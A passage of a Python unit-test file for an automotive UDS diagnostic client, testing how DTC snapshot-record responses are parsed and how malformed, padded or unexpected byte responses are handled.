self.udsclient.config[u'ignore_all_zero_dtc'] = False
must_return_invalid = [True, True, True, False, True]
expect_all_zero_third_dtc_values = [None, None, None, True, None]
for i in xrange(5):
response = self.udsclient.get_dtc_snapshot_identification()
if must_return_invalid[i]:
self.assertFalse(response.valid)
else:
self.client_assert_response(response, expect_all_zero_third_dtc=expect_all_zero_third_dtc_values[i])
def test_no_dtc(self):
self.wait_request_and_respond("\x59\x03")
def _test_no_dtc(self):
response = self.udsclient.get_dtc_snapshot_identification()
self.assertEqual(len(response.service_data.dtcs), 0)
def test_bad_response_subfunction_exception(self):
self.wait_request_and_respond("\x59\x04")
def _test_bad_response_subfunction_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_snapshot_identification()
def test_bad_response_subfunction_no_exception(self):
self.wait_request_and_respond("\x59\x04")
def _test_bad_response_subfunction_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_snapshot_identification()
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_service_exception(self):
self.wait_request_and_respond("\x6F\x03")
def _test_bad_response_service_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_snapshot_identification()
def test_bad_response_service_no_exception(self):
self.wait_request_and_respond("\x6F\x03")
def _test_bad_response_service_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_snapshot_identification()
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_response_length_exception(self):
self.wait_request_and_respond('\x59')
self.wait_request_and_respond('\x59\x03\x12')
self.wait_request_and_respond('\x59\x03\x12\x34')
self.wait_request_and_respond('\x59\x03\x12\x34\x56')
self.wait_request_and_respond('\x59\x03\x12\x34\x56\x01\x12')
def _test_bad_response_length_exception(self):
for i in xrange(5):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_identification()
def test_bad_response_length_no_exception(self):
self.wait_request_and_respond('\x59')
self.wait_request_and_respond('\x59\x03\x12')
self.wait_request_and_respond('\x59\x03\x12\x34')
self.wait_request_and_respond('\x59\x03\x12\x34\x56')
self.wait_request_and_respond('\x59\x03\x12\x34\x56\x01\x12')
def _test_bad_response_length_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(5):
response = self.udsclient.get_dtc_snapshot_identification()
self.assertFalse(response.valid)
class TestReportDTCSnapshotRecordByDTCNumber(ClientServerTest): # Subfn = 0x4
class Codec4711(DidCodec):
def encode(self, did_value):
return struct.pack(u'>BBHB', did_value[u'ect'], did_value[u'tp'], did_value[u'rpm'], did_value[u'map'])
def decode(self, did_payload):
v = dict(ect=0, tp=0, rpm=0, map=0)
(v[u'ect'], v[u'tp'], v[u'rpm'], v[u'map']) = struct.unpack(u'>BBHB', did_payload)
return v
def __len__(self):
return 5
class Codec4455(DidCodec):
def encode(self, did_value):
return struct.pack(u'>H', did_value)
def decode(self, did_payload):
return struct.unpack(u'>H', did_payload)[0]
def __len__(self):
return 2
def postClientSetUp(self):
self.udsclient.config[u"data_identifiers"] = {
0x4455 : self.__class__.Codec4455,
0x4711 : self.__class__.Codec4711,
0x6789 : u'BBB'
}
def single_snapshot_assert_response(self, response):
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x24)
self.assertEqual(len(dtc.snapshots), 1)
snapshot = dtc.snapshots[0]
self.assertTrue(isinstance(snapshot, Dtc.Snapshot))
self.assertEqual(snapshot.record_number, 0x02)
self.assertEqual(snapshot.did, 0x4711)
self.assertEqual(dtc.snapshots[0].data[u'ect'], 0xA6) # Engine Coolant Temp
self.assertEqual(dtc.snapshots[0].data[u'tp'], 0x66) # Throttle Position
self.assertEqual(dtc.snapshots[0].data[u'rpm'], 0x750) # Engine speed
self.assertEqual(dtc.snapshots[0].data[u'map'], 0x20) # Manifoled Absolute Value
def single_snapshot_2_dids_assert_response(self, response):
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x24)
self.assertEqual(len(dtc.snapshots), 2)
self.assertTrue(isinstance(dtc.snapshots[0], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[0].record_number, 0x02)
self.assertEqual(dtc.snapshots[0].did, 0x4711)
self.assertTrue(isinstance(dtc.snapshots[1], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[1].record_number, 0x02)
self.assertEqual(dtc.snapshots[1].did, 0x6789)
self.assertEqual(dtc.snapshots[0].data[u'ect'], 0xA6) # Engine Coolant Temp
self.assertEqual(dtc.snapshots[0].data[u'tp'], 0x66) # Throttle Position
self.assertEqual(dtc.snapshots[0].data[u'rpm'], 0x750) # Engine speed
self.assertEqual(dtc.snapshots[0].data[u'map'], 0x20) # Manifoled Absolute Value
self.assertEqual(dtc.snapshots[1].data[0], 0x99)
self.assertEqual(dtc.snapshots[1].data[1], 0x88)
self.assertEqual(dtc.snapshots[1].data[2], 0x77)
def test_single_snapshot(self): # Example provided in standard
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x04\x12\x34\x56\x02")
self.conn.fromuserqueue.put("\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20")
def _test_single_snapshot(self):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=2)
self.single_snapshot_assert_response(response)
def test_single_snapshot_with_instance_param(self): # Example provided in standard
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x04\x12\x34\x56\x02")
self.conn.fromuserqueue.put("\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20")
def _test_single_snapshot_with_instance_param(self):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=Dtc(0x123456), record_number=2)
self.single_snapshot_assert_response(response)
def test_single_snapshot_zeropadding_ok(self): # Example provided in standard
data = '\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20'
self.udsclient.config[u'tolerate_zero_padding'] = True
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_single_snapshot_zeropadding_ok(self):
for i in xrange(7):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=2)
self.single_snapshot_assert_response(response)
def test_single_snapshot_zeropadding_notok_exception(self): # Example provided in standard
data = '\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20'
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_single_snapshot_zeropadding_notok_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
for i in xrange (7):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=2)
def test_single_snapshot_zeropadding_notok_no_exception(self): # Example provided in standard
data = '\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20'
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_single_snapshot_zeropadding_notok_no_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange (7):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=2)
self.assertFalse(response.valid)
def test_single_snapshot_2_did(self): # Example provided in standard
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x04\x12\x34\x56\x02")
self.conn.fromuserqueue.put("\x59\x04\x12\x34\x56\x24\x02\x02\x47\x11\xa6\x66\x07\x50\x20\x67\x89\x99\x88\x77")
def _test_single_snapshot_2_did(self):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=2)
self.single_snapshot_2_dids_assert_response(response)
def test_multiple_snapshot_multiple_did(self):
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x04\x12\x34\x56\xFF")
self.conn.fromuserqueue.put("\x59\x04\x12\x34\x56\x24\x02\x02\x47\x11\xa6\x66\x07\x50\x20\x67\x89\x99\x88\x77\x03\x01\x44\x55\x43\x21")
def _test_multiple_snapshot_multiple_did(self):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0xFF)
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x24)
self.assertEqual(len(dtc.snapshots), 3)
self.assertTrue(isinstance(dtc.snapshots[0], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[0].record_number, 0x02)
self.assertEqual(dtc.snapshots[0].did, 0x4711)
self.assertTrue(isinstance(dtc.snapshots[1], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[1].record_number, 0x02)
self.assertEqual(dtc.snapshots[1].did, 0x6789)
self.assertTrue(isinstance(dtc.snapshots[2], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[2].record_number, 0x03)
self.assertEqual(dtc.snapshots[2].did, 0x4455)
# data
self.assertEqual(dtc.snapshots[0].data[u'ect'], 0xA6) # Engine Coolant Temp
self.assertEqual(dtc.snapshots[0].data[u'tp'], 0x66) # Throttle Position
self.assertEqual(dtc.snapshots[0].data[u'rpm'], 0x750) # Engine speed
self.assertEqual(dtc.snapshots[0].data[u'map'], 0x20) # Manifoled Absolute Value
self.assertEqual(dtc.snapshots[1].data[0], 0x99)
self.assertEqual(dtc.snapshots[1].data[1], 0x88)
self.assertEqual(dtc.snapshots[1].data[2], 0x77)
self.assertEqual(dtc.snapshots[2].data, 0x4321)
def test_invalid_length_incomplete_dtc_exception(self):
self.wait_request_and_respond('\x59\x04\x12')
self.wait_request_and_respond('\x59\x04\x12\x34')
def _test_invalid_length_incomplete_dtc_exception(self):
for i in xrange(2):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
def test_invalid_length_incomplete_dtc_no_exception(self):
self.wait_request_and_respond('\x59\x04\x12')
self.wait_request_and_respond('\x59\x04\x12\x34')
def _test_invalid_length_incomplete_dtc_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(2):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertFalse(response.valid)
def test_invalid_length_missing_status_exception(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56')
def _test_invalid_length_missing_status_exception(self):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
def test_invalid_length_missing_status_no_exception(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56')
def _test_invalid_length_missing_status_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertFalse(response.valid)
def test_invalid_length_missing_identifier_number_exception(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20\x03')
def _test_invalid_length_missing_identifier_number_exception(self):
for i in xrange(2):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
def test_invalid_length_missing_identifier_number_no_exception(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20\x03')
def _test_invalid_length_missing_identifier_number_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(2):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertFalse(response.valid)
def invalid_length_missing_did_server_task(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x01')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x01\x67')
def test_invalid_length_missing_did_exception(self):
self.invalid_length_missing_did_server_task()
def _test_invalid_length_missing_did_exception(self):
for i in xrange(4):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0xFF)
def test_invalid_length_missing_did_no_exception(self):
self.invalid_length_missing_did_server_task()
def _test_invalid_length_missing_did_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(4):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0xFF)
self.assertFalse(response.valid)
def invalid_length_missing_data_server_task(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x01\x67\x89')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x01\x67\x89\x99')
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x01\x67\x89\x99\x88')
def test_invalid_length_missing_data_exception(self):
self.invalid_length_missing_data_server_task()
def _test_invalid_length_missing_data_exception(self):
for i in xrange(9):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0xff)
def test_invalid_length_missing_data_no_exception(self):
self.invalid_length_missing_data_server_task()
def _test_invalid_length_missing_data_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(9):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0xff)
self.assertFalse(response.valid)
def test_bad_subfunction_exception(self):
self.wait_request_and_respond('\x59\x05\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_subfunction_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
def test_bad_subfunction_no_exception(self):
self.wait_request_and_respond('\x59\x05\x12\x34\x56\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_subfunction_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_dtc_exception(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x57\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_dtc_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
def test_bad_dtc_no_exception(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x57\x24\x02\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_dtc_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_bad_record_number_exception(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x03\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_record_number_exception(self):
with self.assertRaises(UnexpectedResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
def test_bad_record_number_no_exception(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24\x03\x01\x47\x11\xa6\x66\x07\x50\x20')
def _test_bad_record_number_no_exception(self):
self.udsclient.config[u'exception_on_unexpected_response'] = False
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertTrue(response.valid)
self.assertTrue(response.unexpected)
def test_no_record(self):
self.wait_request_and_respond('\x59\x04\x12\x34\x56\x24')
def _test_no_record(self):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x24)
self.assertEqual(len(dtc.snapshots), 0)
def test_no_record_zero_padding_ok(self):
data = '\x59\x04\x12\x34\x56\x24'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_no_record_zero_padding_ok(self):
self.udsclient.config[u'tolerate_zero_padding'] = True
for i in xrange(8):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x24)
self.assertEqual(len(dtc.snapshots), 0)
def test_no_record_zero_padding_not_ok_exception(self):
data = '\x59\x04\x12\x34\x56\x24'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_no_record_zero_padding_not_ok_exception(self):
self.udsclient.config[u'tolerate_zero_padding'] = False
for i in xrange(8):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
def test_no_record_zero_padding_not_ok_no_exception(self):
data = '\x59\x04\x12\x34\x56\x24'
for i in xrange(8):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_no_record_zero_padding_not_ok_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
self.udsclient.config[u'tolerate_zero_padding'] = False
for i in xrange(8):
response = self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x02)
self.assertFalse(response.valid)
def test_oob_values(self):
pass
def _test_oob_values(self):
with self.assertRaises(ValueError):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=-1, record_number=0x02)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x1000000, record_number=0x02)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=-1)
with self.assertRaises(ValueError):
self.udsclient.get_dtc_snapshot_by_dtc_number(dtc=0x123456, record_number=0x100)
class TestReportDTCSnapshotRecordByRecordNumber(ClientServerTest): # Subfn = 0x5
class Codec4711(DidCodec):
def encode(self, did_value):
return struct.pack(u'>BBHB', did_value[u'ect'], did_value[u'tp'], did_value[u'rpm'], did_value[u'map'])
def decode(self, did_payload):
v = dict(ect=0, tp=0, rpm=0, map=0)
(v[u'ect'], v[u'tp'], v[u'rpm'], v[u'map']) = struct.unpack(u'>BBHB', did_payload)
return v
def __len__(self):
return 5
class Codec4455(DidCodec):
def encode(self, did_value):
return struct.pack(u'>H', did_value)
def decode(self, did_payload):
return struct.unpack(u'>H', did_payload)[0]
def __len__(self):
return 2
def postClientSetUp(self):
self.udsclient.config[u"data_identifiers"] = {
0x4455 : self.__class__.Codec4455,
0x4711 : self.__class__.Codec4711,
0x6789 : u'BBB'
}
def single_snapshot_assert_response(self, response):
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x24)
self.assertEqual(len(dtc.snapshots), 1)
snapshot = dtc.snapshots[0]
self.assertTrue(isinstance(snapshot, Dtc.Snapshot))
self.assertEqual(snapshot.record_number, 0x02)
self.assertEqual(snapshot.did, 0x4711)
self.assertEqual(dtc.snapshots[0].data[u'ect'], 0xA6) # Engine Coolant Temp
self.assertEqual(dtc.snapshots[0].data[u'tp'], 0x66) # Throttle Position
self.assertEqual(dtc.snapshots[0].data[u'rpm'], 0x750) # Engine speed
self.assertEqual(dtc.snapshots[0].data[u'map'], 0x20) # Manifoled Absolute Value
def single_snapshot_2_dids_assert_response(self, response):
self.assertEqual(len(response.service_data.dtcs), 1)
self.assertEqual(response.service_data.dtc_count, 1)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x24)
self.assertEqual(len(dtc.snapshots), 2)
self.assertTrue(isinstance(dtc.snapshots[0], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[0].record_number, 0x02)
self.assertEqual(dtc.snapshots[0].did, 0x4711)
self.assertTrue(isinstance(dtc.snapshots[1], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[1].record_number, 0x02)
self.assertEqual(dtc.snapshots[1].did, 0x6789)
self.assertEqual(dtc.snapshots[0].data[u'ect'], 0xA6) # Engine Coolant Temp
self.assertEqual(dtc.snapshots[0].data[u'tp'], 0x66) # Throttle Position
self.assertEqual(dtc.snapshots[0].data[u'rpm'], 0x750) # Engine speed
self.assertEqual(dtc.snapshots[0].data[u'map'], 0x20) # Manifoled Absolute Value
self.assertEqual(dtc.snapshots[1].data[0], 0x99)
self.assertEqual(dtc.snapshots[1].data[1], 0x88)
self.assertEqual(dtc.snapshots[1].data[2], 0x77)
def test_single_snapshot(self): # Example provided in standard
request = self.conn.touserqueue.get(timeout=0.2)
self.assertEqual(request, "\x19\x05\x02")
self.conn.fromuserqueue.put("\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20")
def _test_single_snapshot(self):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=2)
self.single_snapshot_assert_response(response)
def test_single_snapshot_zeropadding_ok_1(self): # Example provided in standard
data = '\x59\x05\x02'
self.udsclient.config[u'tolerate_zero_padding'] = True
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_single_snapshot_zeropadding_ok_1(self):
for i in xrange(7):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=2)
self.assertEqual(len(response.service_data.dtcs), 0)
def test_single_snapshot_zeropadding_ok_2(self): # Example provided in standard
data = '\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20'
self.udsclient.config[u'tolerate_zero_padding'] = True
for i in xrange(7):
self.wait_request_and_respond(data + '\x00' * (i+1))
def _test_single_snapshot_zeropadding_ok_2(self):
for i in xrange(7):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=2)
self.single_snapshot_assert_response(response)
def test_single_snapshot_zeropadding_notok_exception(self): # Example provided in standard
data = '\x59\x05\x00\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20'
self.udsclient.config[u'tolerate_zero_padding'] = False
# one extra 0 is valid for this subfunction, so we start with 2 extra 0 (i+2)
for i in xrange(6):
self.wait_request_and_respond(data + '\x00' * (i + 2))
def _test_single_snapshot_zeropadding_notok_exception(self):
for i in xrange (6):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0)
def test_single_snapshot_zeropadding_notok_no_exception(self): # Example provided in standard
data = '\x59\x05\x00\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20'
self.udsclient.config[u'tolerate_zero_padding'] = False
# one extra 0 is valid for this subfunction, so we start with 2 extra 0 (i+2)
for i in xrange(6):
self.wait_request_and_respond(data + '\x00' * (i + 2))
def _test_single_snapshot_zeropadding_notok_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange (6):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0)
self.assertFalse(response.valid)
def test_single_snapshot_2_did(self): # Example provided in standard
self.wait_request_and_respond("\x59\x05\x02\x12\x34\x56\x24\x02\x47\x11\xa6\x66\x07\x50\x20\x67\x89\x99\x88\x77")
def _test_single_snapshot_2_did(self):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=2)
self.single_snapshot_2_dids_assert_response(response)
def test_multiple_snapshot_multiple_dtc(self):
self.wait_request_and_respond("\x59\x05\x02\x12\x34\x56\x24\x02\x47\x11\xa6\x66\x07\x50\x20\x67\x89\x99\x88\x77\x03\x12\x34\x57\x25\x01\x44\x55\x43\x21")
def _test_multiple_snapshot_multiple_dtc(self):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0xFF)
self.assertEqual(len(response.service_data.dtcs), 2)
self.assertEqual(response.service_data.dtc_count, 2)
dtc = response.service_data.dtcs[0]
self.assertEqual(dtc.id, 0x123456)
self.assertEqual(dtc.status.get_byte_as_int(), 0x24)
self.assertEqual(len(dtc.snapshots), 2)
self.assertTrue(isinstance(dtc.snapshots[0], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[0].record_number, 0x02)
self.assertEqual(dtc.snapshots[0].did, 0x4711)
self.assertTrue(isinstance(dtc.snapshots[1], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[1].record_number, 0x02)
self.assertEqual(dtc.snapshots[1].did, 0x6789)
# data
self.assertEqual(dtc.snapshots[0].data[u'ect'], 0xA6) # Engine Coolant Temp
self.assertEqual(dtc.snapshots[0].data[u'tp'], 0x66) # Throttle Position
self.assertEqual(dtc.snapshots[0].data[u'rpm'], 0x750) # Engine speed
self.assertEqual(dtc.snapshots[0].data[u'map'], 0x20) # Manifoled Absolute Value
self.assertEqual(dtc.snapshots[1].data[0], 0x99)
self.assertEqual(dtc.snapshots[1].data[1], 0x88)
self.assertEqual(dtc.snapshots[1].data[2], 0x77)
dtc = response.service_data.dtcs[1]
self.assertEqual(dtc.id, 0x123457)
self.assertEqual(dtc.status.get_byte_as_int(), 0x25)
self.assertTrue(isinstance(dtc.snapshots[0], Dtc.Snapshot))
self.assertEqual(dtc.snapshots[0].record_number, 0x03)
self.assertEqual(dtc.snapshots[0].did, 0x4455)
self.assertEqual(dtc.snapshots[0].data, 0x4321)
def test_invalid_length_no_record_number_exception(self):
self.wait_request_and_respond('\x59\x05')
def _test_invalid_length_no_record_number_exception(self):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
def test_invalid_length_no_record_number_no_exception(self):
self.wait_request_and_respond('\x59\x05')
def _test_invalid_length_no_record_number_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
self.assertFalse(response.valid)
def test_invalid_length_incomplete_dtc_exception(self):
self.wait_request_and_respond('\x59\x05\x02\x12')
self.wait_request_and_respond('\x59\x05\x02\x12\x34')
def _test_invalid_length_incomplete_dtc_exception(self):
for i in xrange(2):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
def test_invalid_length_incomplete_dtc_exception(self):
self.wait_request_and_respond('\x59\x05\x02\x12')
self.wait_request_and_respond('\x59\x05\x02\x12\x34')
def _test_invalid_length_incomplete_dtc_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(2):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
self.assertFalse(response.valid)
def test_invalid_length_missing_status_exception(self):
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56')
def _test_invalid_length_missing_status_exception(self):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
def test_invalid_length_missing_status_no_exception(self):
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56')
def _test_invalid_length_missing_status_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0x02)
self.assertFalse(response.valid)
def invalid_length_missing_identifier_number_server_task(self):
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24')
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01\x47\x11\xa6\x66\x07\x50\x20\x03\x12\x34\x57\x25')
def test_invalid_length_missing_identifier_number_exception(self):
self.invalid_length_missing_identifier_number_server_task()
def _test_invalid_length_missing_identifier_number_exception(self):
for i in xrange(2):
with self.assertRaises(InvalidResponseException):
self.udsclient.get_dtc_snapshot_by_record_number(record_number=0xFF)
def test_invalid_length_missing_identifier_number_no_exception(self):
self.invalid_length_missing_identifier_number_server_task()
def _test_invalid_length_missing_identifier_number_no_exception(self):
self.udsclient.config[u'exception_on_invalid_response'] = False
for i in xrange(2):
response = self.udsclient.get_dtc_snapshot_by_record_number(record_number=0xFF)
self.assertFalse(response.valid)
def invalid_length_missing_did_server_task(self):
self.wait_request_and_respond('\x59\x05\x02\x12\x34\x56\x24\x01')
